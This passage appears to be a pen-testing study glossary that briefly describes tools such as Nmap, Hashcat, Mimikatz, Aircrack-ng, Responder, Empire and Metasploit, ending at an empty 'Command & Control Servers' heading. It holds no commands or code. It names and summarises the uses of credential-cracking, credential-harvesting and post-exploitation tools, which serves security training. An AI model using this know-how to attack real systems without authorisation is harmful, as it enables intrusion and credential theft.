- Nmap: An open source network scanner used for network discovery and auditing. It can discover hosts, scan ports, enumerate services, fingerprint operating systems, and run script-based vulnerability tests.
- Nikto: An open source web server scanner that searches for potentially harmful files, checks for outdated web server software, and looks for problems that occur with some web server software versions. It is included with Kali Linux.
- OpenVAS (Open Vulnerability Assessment System): An open source software framework for vulnerability scanning and management.
- SQLmap: An open source database scanner that searches for and exploits SQL injection flaws. It is included with Kali Linux.
- Nessus: A proprietary vulnerability scanner developed by Tenable Network Security. Initially open source, it scans for vulnerabilities, misconfigurations, default passwords, and susceptibility to denial of service (DoS) attacks. It can also be used for preparation for PCI DSS audits.
Credential Testing Tools
- Hashcat: A free password recovery tool that is included with Kali Linux and is available for Linux, OS X, and Windows. It includes a very wide range of hashing algorithms and password cracking methods. Hashcat purports itself to be the fastest recovery tool available.
- Medusa: A command-line-based free password cracking tool that is often used in brute force password attacks on remote authentication servers. It purports itself to specialize in parallel attacks, with the ability to locally test 2,000 passwords per minute.
- THC-Hydra: A free network login password cracking tool that is included with Kali Linux. It supports a number of authentication protocols.
- CeWL: A Ruby app that crawls websites to generate word lists that can be used with password crackers such as John the Ripper. It is included with Kali Linux.
- John the Ripper: A free password recovery tool available for Linux, 11 versions of Unix, DOS, Win32, BeOS, and OpenVMS. It is included with Kali Linux.
- Cain and Abel: A free password recovery tool available for Windows that is sometimes classified as malware by some antivirus software.
- Mimikatz: An open source tool that enables you to view credential information stored on Microsoft Windows computers. It is also included with Kali Linux.
- Patator: A brute force password cracking tool included with Kali Linux.
- Dirbuster: A brute force tool included with Kali Linux that exposes directories and file names on web and application servers.
- W3AF (Web Application Attack and Audit Framework): A Python tool included in Kali Linux that tries to identify and exploit any web app vulnerabilities.
- OLLYDBG: A reverse-engineering tool included with Kali Linux that analyzes binary code found in 32-bit Windows applications.
- Immunity debugger: A reverse-engineering tool that includes both command-line and graphical user interfaces and that can load and modify Python scripts during runtime.
- GDB (GNU Project Debugger): An open source reverse-engineering tool that works on most Unix and Windows versions, along with macOS.
- WinDBG (Windows Debugger): A free debugging tool created and distributed by Microsoft for Windows operating systems.
- IDA (Interactive Disassembler): A reverse-engineering tool that generates source code from machine code for Windows, Mac OS X, and Linux applications.
Software Assurance Tools
- Findbugs and findsecbugs: FindBugs is an open source static code analyzer or static application security testing (SAST) tool that detects possible bugs in Java programs. FindSecurityBugs is an open source plugin that detects security issues in Java web applications.
- Peach: Peach Tech offers several dynamic application security testing (DAST) products for pen testing, including Peach API Security, which helps secure web APIs against the OWASP Top 10, and Peach Fuzzer, an automated security testing platform for prevention of zero-day attacks. Within Peach Fuzzer, modular test definitions called Peach Pits enable you to fully customize exploits against test targets.
- AFL (American fuzzy lop): An open source DAST tool that feeds input to a program to test for bugs and possible security vulnerabilities.
- SonarQube: An open source SAST platform that continuously inspects code quality to help discover bugs and security vulnerabilities.
- YASCA (yet another source code analyzer): An open source SAST program that inspects source code for security vulnerabilities, code quality, and performance.
- Whois: A protocol that queries databases that store registered users or assignees of an Internet resource, such as a domain name.
- Nslookup: A Windows command-line utility that queries DNS and displays domain names or IP address mappings, depending on the options used.
- FOCA: (Fingerprinting and Organization with Collected Archives) A network infrastructure mapping tool that analyzes metadata from many file types to enumerate users, folders, software and OS information, and other information.
- theHarvester: A tool included with Kali Linux that gathers information such as email addresses, subdomains, host names, open ports, and banners from publicly available sources.
- Shodan: A search engine that returns information about the types of devices connected to the Internet by inspecting the metadata included in service banners.
- Maltego: A proprietary software tool that assists with gathering open source intelligence (OSINT) and with forensics by analyzing relationships between people, groups, websites, domains, networks, and applications. A community version named Maltego Teeth is included with Kali Linux.
- Recon-ng: A web reconnaissance tool that is written in Python and is included with Kali Linux. It uses over 80 "modules" to automate OSINT. Some of its features include: search for files, discover hosts/contacts/email addresses, snoop DNS caches, look for VPNs, look up password hashes, and perform geolocation.
- Censys: A search engine that returns information about the types of devices connected to the Internet.
- Aircrack-ng: A suite of wireless tools, including airmon-ng, airodump-ng, aireplay-ng, and aircrack-ng. Included with Kali Linux, the suite can sniff and attack wireless connections, and crack WEP and WPA/WPA2-PSK keys.
- Kismet: An 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system that is included with Kali Linux. It can be used to monitor wireless activity, identify device types, and capture raw packets for later password cracking.
- WiFite: A wireless auditing tool included with Kali Linux that can attack multiple WEP, WPA, and WPS encrypted networks in a row.
- WiFi-Pumpkin: A rogue wireless access point and man-in-the-middle tool used to snoop traffic and harvest credentials.
Web Proxy Tools
- OWASP ZAP (Open Web Application Security Project Zed Attack Proxy): An open source web application security scanner.
- Burp Suite: An integrated platform included with Kali Linux for testing the security of web applications. Acting as a local proxy, it allows the attacker to capture, analyze, and manipulate HTTP traffic.
Social Engineering Tools
- SET (Social Engineer Toolkit): An open source pen testing framework included with Kali Linux that supports the use of social engineering to penetrate a network or system.
- BeEF (Browser Exploitation Framework): A pen testing tool included with Kali Linux that focuses on web browsers and that can be used for XSS and injection attacks against a website.
Remote Access Tools
- SSH (Secure Shell): A program that enables a user or an application to log on to another device over an encrypted network connection, run commands in a remote machine, and transfer files from one machine to the other.
- Ncat: An open source command-line tool for reading, writing, redirecting, and encrypting data across a network. Ncat was developed as an improved version of Netcat.
- Netcat: An open source networking utility for debugging and investigating the network, and that can be used for creating TCP/UDP connections and investigating them.
- Proxychains: Included with Kali Linux, as well as any other version of Linux, a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers.
- Wireshark: An open source network protocol analyzer that is included with Kali Linux. Can be used to sniff many traffic types, re-create entire TCP sessions, and capture copies of files transmitted on the network.
- hping: A free packet generator and analyzer for TCP/IP networks. Often used for firewall testing and advanced network testing, hping3 is included with Kali Linux.
- Drozer: A security testing framework for Android apps and devices.
- APKX (Android Package Kit): A Python wrapper for dex converters and Java decompilers that is included in the OWASP Mobile Testing Guide.
- APX Studio: A cross-platform IDE for reverse engineering Android applications.
- Searchsploit: A tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive.
- Powersploit: A series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. This tool is included in Kali Linux.
- Responder: A fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries in order to possibly recover sensitive information such as user names and passwords.
- Impacket: A collection of Python classes that provide low-level program access to packets, as well as to protocols and their implementation.
- Empire (PowerShell Empire): A post-exploitation framework for Windows devices. It allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data and extract passwords, and install persistent backdoors.
- Metasploit Framework: A command-line-based pen testing framework developed by Rapid 7 that is included with Kali Linux and that enables you to find, exploit, and validate vulnerabilities. Metasploit also has GUI-based commercial and community versions.
Command & Control Servers